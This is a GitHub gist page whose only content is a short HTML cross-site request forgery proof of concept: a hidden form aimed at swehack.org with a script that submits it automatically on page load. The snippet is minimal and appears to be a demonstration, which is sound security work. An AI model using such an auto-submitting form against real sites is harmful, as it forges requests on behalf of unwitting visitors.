Skip to content

Instantly share code, notes, and snippets.

@intchloe
Created April 13, 2016 14:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save intchloe/c25fe57fffb7785f322a8a2e4360c29e to your computer and use it in GitHub Desktop.
Save intchloe/c25fe57fffb7785f322a8a2e4360c29e to your computer and use it in GitHub Desktop.
<form name="csrf" ENCTYPE="text/plain" action="https://swehack.org" method="GET">
<input type="hidden" name='foo'>
</form>
<script>document.csrf.submit();</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment